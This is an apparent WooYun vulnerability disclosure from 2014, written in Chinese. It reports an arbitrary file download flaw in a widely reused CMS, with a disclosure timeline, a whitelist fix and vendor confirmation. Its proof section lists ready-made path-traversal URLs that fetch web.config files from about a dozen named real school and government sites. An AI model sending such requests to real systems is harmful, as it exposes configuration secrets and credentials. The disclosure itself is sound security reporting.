漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-062598
漏洞标题:某通用性CMS任意文件下载
相关厂商:cncert国家互联网应急中心
漏洞作者: 梧桐雨
提交时间:2014-05-28 11:14
修复时间:2014-08-26 11:16
公开时间:2014-08-26 11:16
漏洞类型:任意文件遍历/下载
危害等级:中
自评Rank:18
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-28: 细节已通知厂商并且等待厂商处理中
2014-06-01: 厂商已经确认,细节仅向厂商公开
2014-06-04: 细节向第三方安全合作伙伴开放
2014-07-26: 细节向核心白帽子及相关领域专家公开
2014-08-05: 细节向普通白帽子公开
2014-08-15: 细节向实习白帽子公开
2014-08-26: 细节向公众公开
简要描述:
对用户传入的参数没有进行限制导致任意文件下载
详细说明:
出现这个漏洞的webcms是湖南爱瑞杰科技发展股份有限公司
网上能找到非常多的例子。另外,在footer还能找到一个上海心通技术有限公司协助制作
实际上为同一家公司,通过该漏洞我down回来的源码对比其实是一样的。仅仅版权不一样(copy的同时把别人的漏洞也拷贝过来了?呵呵)
先看实例1:
http://jyj.nanyue.gov.cn/jyxx/manage/download.aspx?File=../web.config
去重之后还是有几十个网站的。
为什么说上面一样呢,我下载了download.aspx.cs对比:连注释都一样的所以可以肯定是同一套系统了。
漏洞证明:
http://jyj.nanyue.gov.cn/jyxx/manage/download.aspx?File=../web.config
www.czsz.cn/manage/download.aspx?File=../web.config
http://www.shixi.stn.sh.cn/manage/download.aspx?File=../web.config
www.yzbzxx.cn/manage/download.aspx?File=../web.config
www.lqschool.cn/manage/download.aspx?File=../web.config
www.tjzx.net.cn/manage/download.aspx?File=../web.config
www.cztjb.com.cn/manage/download.aspx?File=../web.config
www.shjyzb.com/manage/download.aspx?File=../web.config
www.cyzxfx.pte.sh.cn/web/manage/download.aspx?File=../web.config
www.peiming.edu.sh.cn/web/manage/download.aspx?File=../web.config
http://qiuzhen.eicbs.com/web/manage/download.aspx?File=../web.config
www.ygezx.com/web/manage/download.aspx?File=../web.config
www.jssyxx.net/web/manage/download.aspx?File=../web.config
足矣证明危害了,不再一一列举。
修复方案:
限制用户传入的参数以及下载的后缀。最好是白名单控制。
版权声明:转载请注明来源 梧桐雨@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2014-06-01 22:53
厂商回复:
CNVD确认并复现所述情况,由CNVD通过公开渠道联系软件生产厂商处置。
最新状态:
暂无